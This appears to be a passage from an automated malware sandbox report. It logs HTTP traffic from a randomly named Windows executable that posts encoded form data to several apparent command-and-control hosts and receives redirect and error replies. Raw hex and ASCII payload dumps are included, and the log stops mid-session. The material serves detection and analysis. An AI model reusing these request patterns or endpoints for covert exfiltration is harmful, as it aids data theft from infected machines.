                                              Data Raw: 62 50 44 3d 79 65 30 64 41 4f 37 54 61 6b 57 6f 30 4a 69 32 74 67 2b 32 64 2f 51 72 37 57 50 49 6e 67 74 4a 4d 76 32 4e 69 52 41 73 75 75 71 61 55 34 7a 66 5a 32 65 4a 7a 4e 62 73 74 30 6f 33 66 55 67 39 46 2f 63 4b 77 4d 6d 31 78 66 66 2b 41 31 79 5a 6e 54 62 72 35 73 76 73 4c 6d 54 50 4a 42 48 7a 57 38 73 36 67 57 33 6d 70 69 6e 73 45 39 34 4c 58 50 49 79 6f 6f 47 32 78 49 77 4e 6b 71 4c 43 61 64 51 36 56 6e 61 38 69 4c 2f 43 52 38 77 33 57 36 67 74 6b 58 31 44 43 6f 50 43 66 44 42 75 58 47 31 71 6e 62 61 63 65 76 6a 56 54 4a 42 76 46 2b 71 37 41 44 7a 78 68 31 64 34 43 6e 6b 44 6c 67 3d 3d
                                              Data Ascii: bPD=ye0dAO7TakWo0Ji2tg+2d/Qr7WPIngtJMv2NiRAsuuqaU4zfZ2eJzNbst0o3fUg9F/cKwMm1xff+A1yZnTbr5svsLmTPJBHzW8s6gW3mpinsE94LXPIyooG2xIwNkqLCadQ6Vna8iL/CR8w3W6gtkX1DCoPCfDBuXG1qnbacevjVTJBvF+q7ADzxh1d4CnkDlg==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.4497493.33.130.190805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:23.617557049 CEST723OUTPOST /5gvb/ HTTP/1.1
                                              Host: www.hourglasspoise.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.hourglasspoise.net
                                              Referer: http://www.hourglasspoise.net/5gvb/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 79 65 30 64 41 4f 37 54 61 6b 57 6f 30 70 53 32 68 6a 57 32 62 66 51 71 33 32 50 49 74 41 74 4e 4d 75 4b 4e 69 52 6f 38 75 64 43 61 55 64 50 66 59 79 43 4a 30 4e 62 73 6d 55 6f 79 53 30 67 36 46 2f 51 43 77 4e 71 31 78 62 33 2b 41 78 2b 5a 79 77 44 71 2f 38 76 75 44 47 54 52 57 52 48 7a 57 38 73 36 67 57 4b 39 70 6a 44 73 46 4d 49 4c 47 65 49 78 30 34 47 33 32 49 77 4e 67 71 4c 47 61 64 52 66 56 6d 48 54 69 4a 33 43 52 34 34 33 57 72 67 73 75 58 31 4e 64 59 4f 6d 50 6a 46 6e 59 30 77 74 67 6f 79 38 52 38 72 34 53 50 51 31 55 50 4c 73 53 44 58 43 38 79 55 4d 50 6b 5a 4b 2b 76 46 34 63 6c 50 42 45 49 53 75 58 65 50 43 61 34 47 35 4b 6e 6b 3d
                                              Data Ascii: bPD=ye0dAO7TakWo0pS2hjW2bfQq32PItAtNMuKNiRo8udCaUdPfYyCJ0NbsmUoyS0g6F/QCwNq1xb3+Ax+ZywDq/8vuDGTRWRHzW8s6gWK9pjDsFMILGeIx04G32IwNgqLGadRfVmHTiJ3CR443WrgsuX1NdYOmPjFnY0wtgoy8R8r4SPQ1UPLsSDXC8yUMPkZK+vF4clPBEISuXePCa4G5Knk=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.4497503.33.130.190805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:26.203167915 CEST10805OUTPOST /5gvb/ HTTP/1.1
                                              Host: www.hourglasspoise.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.hourglasspoise.net
                                              Referer: http://www.hourglasspoise.net/5gvb/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 79 65 30 64 41 4f 37 54 61 6b 57 6f 30 70 53 32 68 6a 57 32 62 66 51 71 33 32 50 49 74 41 74 4e 4d 75 4b 4e 69 52 6f 38 75 62 61 61 58 72 37 66 59 54 43 4a 31 4e 62 73 6c 55 6f 7a 53 30 67 6e 46 38 67 47 77 4e 33 43 78 5a 50 2b 47 55 69 5a 32 78 44 71 32 38 76 75 42 47 54 4d 4a 42 48 6d 57 36 4d 6c 67 57 36 39 70 6a 44 73 46 50 41 4c 47 50 49 78 32 34 47 32 78 49 77 42 6b 71 4c 75 61 5a 31 6c 56 6d 53 73 69 35 58 43 53 5a 45 33 51 5a 49 73 73 33 30 72 65 59 4f 2b 50 69 34 2f 59 30 73 51 67 70 47 61 52 37 72 34 52 4b 52 70 4a 75 4c 54 54 43 6e 4f 6f 41 64 70 4a 6b 68 7a 2f 38 52 6a 56 58 44 49 61 4a 2f 46 66 4a 2f 50 43 5a 61 74 63 77 50 2f 70 57 69 48 4a 47 32 65 4e 51 72 38 4a 4e 4d 4d 35 2f 6a 50 66 61 49 76 53 51 2f 59 78 63 67 6f 7a 71 51 4c 4e 48 47 66 53 36 32 54 66 4a 7a 33 4f 72 53 44 57 31 31 61 79 51 7a 68 65 44 75 52 58 5a 38 6a 36 59 30 78 68 62 43 6c 76 4f 38 6a 33 57 4e 41 4f 55 33 37 4e 65 59 4b 56 4d 2b 5a 70 47 32 77 68 34 36 4d 4b 37 66 6f 5a 72 38 74 4a 70 59 35 56 6f [TRUNCATED]
                                              Data Ascii: bPD=ye0dAO7TakWo0pS2hjW2bfQq32PItAtNMuKNiRo8ubaaXr7fYTCJ1NbslUozS0gnF8gGwN3CxZP+GUiZ2xDq28vuBGTMJBHmW6MlgW69pjDsFPALGPIx24G2xIwBkqLuaZ1lVmSsi5XCSZE3QZIss30reYO+Pi4/Y0sQgpGaR7r4RKRpJuLTTCnOoAdpJkhz/8RjVXDIaJ/FfJ/PCZatcwP/pWiHJG2eNQr8JNMM5/jPfaIvSQ/YxcgozqQLNHGfS62TfJz3OrSDW11ayQzheDuRXZ8j6Y0xhbClvO8j3WNAOU37NeYKVM+ZpG2wh46MK7foZr8tJpY5Vo8jt32Zt9iXdQyrGv+lHJ1nvYX88zs2Ib7ZDB9oDa78N5eEHxOR31yGPFiTnhqoCktltddmKpPSXJRDU2tnmuyti/na+rCsuxqex2gtO8uDefRVhvhboPGdiJOOn3oeX3D8T+Q849MMk30FqCx06c126ZPnOjFEsWdx3+2vdiwdhH96LwmhV7l0kYpTv7fcl+ICOU1e7VFUG8lxLpETlD4JjhanU1wQ85ahEHs0hJ5/CJ9BKyU8iaLceYU4XmwjsdlLWVvR4/A0aTDLygrLj+Ziim2iNzCacMdH1WoUGqmLLexdZ+hcHiB+XYMxKeVd4Q0VgM6Kd7hbq/zTNJiZJTuDtBDqQWJrvvByV/MTj6BZCV+YfbaR4OBJxQ2+cXVV6oQyPyIy1qVlfIEb/OD4hIuXqSlGUnbSylJWzc+Icp5yGacTaaWKKNH9w72vsc4qpwcvNqFOpexs1XxrhU3h5YM58fY9zd9xnnjAGeGmEPBMof8rP9dpAoblVEzn9HEcqSx2e2SRdKRF+vkF8cJm0kLEt2kF0VSyExNN4mMLYMMpmgd6AzCAYqA6rx8QyOgABj9VmcEXs83dfzg1KFLWVzrSRwmDFvn7gmxJingz7Oao2Xu4xWVedlhvggv5tfdigTr0FW+zgFo/aFeTaUZ6Mj/mPUDSgQtjVSo5 [TRUNCATED]
                                              Jul 26, 2024 13:57:26.247764111 CEST1236OUTData Raw: 4f 74 73 76 55 61 46 70 55 46 44 76 46 52 64 34 5a 66 52 38 5a 4c 52 74 6c 46 48 53 73 43 51 64 36 4e 48 79 72 62 5a 7a 7a 32 66 46 57 43 6c 45 32 43 67 67 59 6b 77 52 6d 48 68 7a 6e 74 58 67 79 48 76 50 48 34 37 32 79 44 65 78 35 33 46 30 47 56
                                              Data Ascii: OtsvUaFpUFDvFRd4ZfR8ZLRtlFHSsCQd6NHyrbZzz2fFWClE2CggYkwRmHhzntXgyHvPH472yDex53F0GVM8UN0yAT60sSVxL2iPIp/WZaORThC7k1w3NBPk1CmOHl4Lw9g0U9jwnlNKA0oR1BR2YlIquuQNP7N+zOO5XNOQccXWRA9kgyBTHqLIec5inxKkFYLeC/Yry5+I+k5gTjRMWr6WP9FiFQCAfOptpi7EON5ulHj15ry


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.4497513.33.130.190805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:28.775079966 CEST435OUTGET /5gvb/?r4HtI=inDHeTS0D6JHi&bPD=/cc9D7vqfViixqGthyicdvN6zULLmywOC8ezpB4FmcTpRtjTbyPN+qyyn2oVZVAAZJsSw+aEzq+oGUOxhiKfxK7cUWDoBkvPGfZgrhOxmX7AStJyIMBk2Ik= HTTP/1.1
                                              Host: www.hourglasspoise.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:57:29.248251915 CEST399INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Fri, 26 Jul 2024 11:57:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 259
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 34 48 74 49 3d 69 6e 44 48 65 54 53 30 44 36 4a 48 69 26 62 50 44 3d 2f 63 63 39 44 37 76 71 66 56 69 69 78 71 47 74 68 79 69 63 64 76 4e 36 7a 55 4c 4c 6d 79 77 4f 43 38 65 7a 70 42 34 46 6d 63 54 70 52 74 6a 54 62 79 50 4e 2b 71 79 79 6e 32 6f 56 5a 56 41 41 5a 4a 73 53 77 2b 61 45 7a 71 2b 6f 47 55 4f 78 68 69 4b 66 78 4b 37 63 55 57 44 6f 42 6b 76 50 47 66 5a 67 72 68 4f 78 6d 58 37 41 53 74 4a 79 49 4d 42 6b 32 49 6b 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?r4HtI=inDHeTS0D6JHi&bPD=/cc9D7vqfViixqGthyicdvN6zULLmywOC8ezpB4FmcTpRtjTbyPN+qyyn2oVZVAAZJsSw+aEzq+oGUOxhiKfxK7cUWDoBkvPGfZgrhOxmX7AStJyIMBk2Ik="}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449752217.160.164.240805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:34.403213978 CEST685OUTPOST /34b9/ HTTP/1.1
                                              Host: www.asymtos.tech
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.asymtos.tech
                                              Referer: http://www.asymtos.tech/34b9/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 62 34 35 43 52 51 52 58 78 50 51 70 5a 77 63 46 68 38 75 79 4c 52 37 34 56 72 4c 53 75 62 49 73 65 70 47 2f 38 76 75 38 53 62 69 61 39 75 33 6f 79 4b 44 71 6b 74 4f 53 4b 66 68 6a 63 4e 62 70 59 71 4d 4c 74 55 65 68 57 76 6f 39 79 39 47 4e 41 68 37 77 74 71 2f 4e 55 4c 69 30 48 56 78 78 63 47 72 76 75 4d 4e 51 69 33 57 61 65 74 79 66 77 72 43 4b 62 51 2b 6c 48 56 67 74 74 66 4c 34 6e 6f 78 5a 73 75 4d 2b 4c 61 4b 6d 4c 70 41 41 4d 63 47 4b 49 6d 67 4f 41 63 6e 57 72 5a 55 5a 65 37 4a 45 2b 52 54 2f 53 4c 57 53 6b 78 53 46 4a 4b 31 73 2b 43 59 6f 55 6c 43 37 5a 6e 5a 4d 58 51 3d 3d
                                              Data Ascii: bPD=b45CRQRXxPQpZwcFh8uyLR74VrLSubIsepG/8vu8Sbia9u3oyKDqktOSKfhjcNbpYqMLtUehWvo9y9GNAh7wtq/NULi0HVxxcGrvuMNQi3WaetyfwrCKbQ+lHVgttfL4noxZsuM+LaKmLpAAMcGKImgOAcnWrZUZe7JE+RT/SLWSkxSFJK1s+CYoUlC7ZnZMXQ==
                                              Jul 26, 2024 13:57:35.005362988 CEST349INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Fri, 26 Jul 2024 11:57:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://asymtos.ai/34b9/
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.449753217.160.164.240805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:36.987916946 CEST705OUTPOST /34b9/ HTTP/1.1
                                              Host: www.asymtos.tech
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.asymtos.tech
                                              Referer: http://www.asymtos.tech/34b9/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 62 34 35 43 52 51 52 58 78 50 51 70 59 51 73 46 6e 62 36 79 61 78 37 37 4a 62 4c 53 6e 37 49 77 65 70 61 2f 38 75 72 33 52 75 36 61 36 50 48 6f 78 4f 33 71 71 4e 4f 53 65 50 68 63 42 39 62 75 59 71 51 44 74 52 2b 68 57 76 73 39 79 2f 75 4e 41 51 37 2f 74 36 2f 50 59 72 69 4d 61 46 78 78 63 47 72 76 75 50 78 32 69 33 65 61 65 2b 71 66 32 4f 2f 63 45 67 2b 6b 58 6c 67 74 6e 2f 4c 38 6e 6f 78 33 73 73 6f 59 4c 63 47 6d 4c 70 51 41 4e 4e 47 4a 47 57 67 49 45 63 6d 4f 34 63 6c 39 63 4c 46 50 34 67 2f 45 50 50 4f 35 6f 58 44 66 59 37 55 37 73 43 38 62 4a 69 4c 50 55 6b 6b 46 4d 59 72 38 38 6f 32 42 6f 52 6c 59 4f 7a 48 71 44 46 63 52 2f 62 34 3d
                                              Data Ascii: bPD=b45CRQRXxPQpYQsFnb6yax77JbLSn7Iwepa/8ur3Ru6a6PHoxO3qqNOSePhcB9buYqQDtR+hWvs9y/uNAQ7/t6/PYriMaFxxcGrvuPx2i3eae+qf2O/cEg+kXlgtn/L8nox3ssoYLcGmLpQANNGJGWgIEcmO4cl9cLFP4g/EPPO5oXDfY7U7sC8bJiLPUkkFMYr88o2BoRlYOzHqDFcR/b4=
                                              Jul 26, 2024 13:57:37.598294973 CEST349INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Fri, 26 Jul 2024 11:57:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://asymtos.ai/34b9/
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.449754217.160.164.240805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:39.562014103 CEST10787OUTPOST /34b9/ HTTP/1.1
                                              Host: www.asymtos.tech
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.asymtos.tech
                                              Referer: http://www.asymtos.tech/34b9/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 62 34 35 43 52 51 52 58 78 50 51 70 59 51 73 46 6e 62 36 79 61 78 37 37 4a 62 4c 53 6e 37 49 77 65 70 61 2f 38 75 72 33 52 75 79 61 36 39 50 6f 78 70 72 71 70 4e 4f 53 42 2f 68 6e 42 39 62 2f 59 71 59 48 74 52 79 78 57 74 6b 39 79 63 57 4e 47 69 54 2f 69 36 2f 50 57 37 69 33 48 56 78 67 63 47 37 77 75 50 68 32 69 33 65 61 65 34 75 66 78 62 44 63 47 67 2b 6c 48 56 67 66 74 66 4c 45 6e 6f 35 42 73 73 38 75 4b 73 6d 6d 4b 4e 4d 41 4b 2f 65 4a 45 32 67 4b 44 63 6d 64 34 63 68 69 63 4c 49 32 34 67 37 75 50 49 75 35 34 78 62 44 63 62 51 36 2f 55 34 53 4b 6a 4c 49 54 6e 46 63 4d 2f 62 7a 35 34 32 4e 2b 6a 31 6b 4d 6b 58 76 66 46 6f 4a 69 72 56 34 42 42 61 34 41 66 4d 58 66 69 41 4e 64 5a 66 62 30 46 55 50 6f 50 50 68 68 6f 34 63 36 34 41 49 56 48 34 54 62 43 36 45 41 51 46 67 79 6c 6d 74 42 79 41 4b 56 46 5a 67 45 7a 62 6e 76 50 4f 30 74 55 38 78 42 4d 6b 6d 49 4b 69 53 41 34 32 4e 55 59 39 58 68 52 32 61 63 71 4a 64 74 4b 52 63 5a 4c 2f 57 38 30 2f 54 62 78 32 76 65 64 4d 53 73 58 36 73 44 79 [TRUNCATED]
                                              Data Ascii: bPD=b45CRQRXxPQpYQsFnb6yax77JbLSn7Iwepa/8ur3Ruya69PoxprqpNOSB/hnB9b/YqYHtRyxWtk9ycWNGiT/i6/PW7i3HVxgcG7wuPh2i3eae4ufxbDcGg+lHVgftfLEno5Bss8uKsmmKNMAK/eJE2gKDcmd4chicLI24g7uPIu54xbDcbQ6/U4SKjLITnFcM/bz542N+j1kMkXvfFoJirV4BBa4AfMXfiANdZfb0FUPoPPhho4c64AIVH4TbC6EAQFgylmtByAKVFZgEzbnvPO0tU8xBMkmIKiSA42NUY9XhR2acqJdtKRcZL/W80/Tbx2vedMSsX6sDyPX0Ug3AzvsuNXP9yKOXdWwlN78sug7FTFkiBSM6nI7UMuWXTdKqLvcZEgpgbnbBwCGUARa05rqkqnw0/lErTUhTfcXYnOOOvlcFaKOt2I6F7Y1eNZiihM3oyx5AWKSHEHMICz3SIDq9zd8z+r1Xd+09Tf0Iv7ftFwkcpQuEK/HHSxLv1aqJ+q6xZImdjy/MbHMHxEzZLIrY5C+x8IDChnLz/zhpjpikgONh9KnuHqMz08f9cZZvWhBGndgVQZ2YKmKaZhgbaG/g0B7tCWXpxDGtl4In1yBqpa5qdb25Gdm5gtKXPKz3W8uSY3YT4GetgEAUFOytOiJkiT1m8dOp+7P9AYK9BpFLAE42CzPNcmatjbKglazDX63FhmmST8UJa/d5lvwUGDUpAT7ip/+UVlnDoYIVhAx7qJGC8egYD0XWzYS3zVTWI+x93u5Ktd/APwLFDBzNAXajFYQnb+naLTp6ZXZvAF/XG/ycahzUJjNXPnq89pK/SO2SOhWRjX7ZiSpZ3juk3GudsCvs6HktBLr+1mEXEJ+fzbRQ7DHzd3WLM2zDJZtfz4UxkdzzmlgdSal0lNnPCR8TnlZmgs102XIJk3aajm9WQ3B+P0gNnCOpn1VVMhhGRT44g1u0QEIdsZGG4B57ot+jSFYK/IeLvOOWQe5Pxpua8y/ [TRUNCATED]
                                              Jul 26, 2024 13:57:40.169842958 CEST349INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Fri, 26 Jul 2024 11:57:40 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://asymtos.ai/34b9/
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.449755217.160.164.240805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:42.160996914 CEST429OUTGET /34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETygayReM86N3bYDrSkNDIFOCHTFVOdGC1q9B2gGW6d9vv3KfEEgs=&r4HtI=inDHeTS0D6JHi HTTP/1.1
                                              Host: www.asymtos.tech
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:57:42.775219917 CEST494INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Fri, 26 Jul 2024 11:57:42 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://asymtos.ai/34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETygayReM86N3bYDrSkNDIFOCHTFVOdGC1q9B2gGW6d9vv3KfEEgs=&r4HtI=inDHeTS0D6JHi
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.449756203.161.42.162805580C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 13:57:47.969371080 CEST679OUTPOST /ukrf/ HTTP/1.1
                                              Host: www.lontos.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.lontos.top
                                              Referer: http://www.lontos.top/ukrf/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Raw: 62 50 44 3d 49 39 46 4a 55 42 2b 4c 47 58 41 6b 51 4e 42 6b 32 62 4e 75 67 47 72 6f 4b 74 34 53 38 6a 61 38 75 30 63 73 49 48 54 4d 6c 52 41 41 33 44 4a 42 6a 52 62 77 6d 43 63 47 4a 6d 73 6a 49 68 66 4e 62 70 74 68 54 66 45 66 69 6f 47 71 61 6d 4a 71 6c 34 6e 79 4c 74 31 4a 77 63 63 6c 4a 32 52 49 4c 54 37 68 70 74 33 47 4d 64 37 69 61 4a 38 57 47 70 30 39 41 33 6b 65 78 59 62 44 7a 53 43 71 50 36 66 4d 52 50 55 49 42 51 42 59 58 4f 69 72 72 32 66 66 4f 34 31 30 4f 69 6c 74 55 56 4c 58 50 39 44 77 38 52 33 4e 6e 53 4d 31 61 52 47 5a 2b 74 42 79 61 61 65 66 34 54 37 7a 4d 34 4a 5a 45 67 3d 3d
                                              Data Ascii: bPD=I9FJUB+LGXAkQNBk2bNugGroKt4S8ja8u0csIHTMlRAA3DJBjRbwmCcGJmsjIhfNbpthTfEfioGqamJql4nyLt1JwcclJ2RILT7hpt3GMd7iaJ8WGp09A3kexYbDzSCqP6fMRPUIBQBYXOirr2ffO410OiltUVLXP9Dw8R3NnSM1aRGZ+tByaaef4T7zM4JZEg==
                                              Jul 26, 2024 13:57:48.598254919 CEST533INHTTP/1.1 404 Not Found
                                              Date: Fri, 26 Jul 2024 11:57:48 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
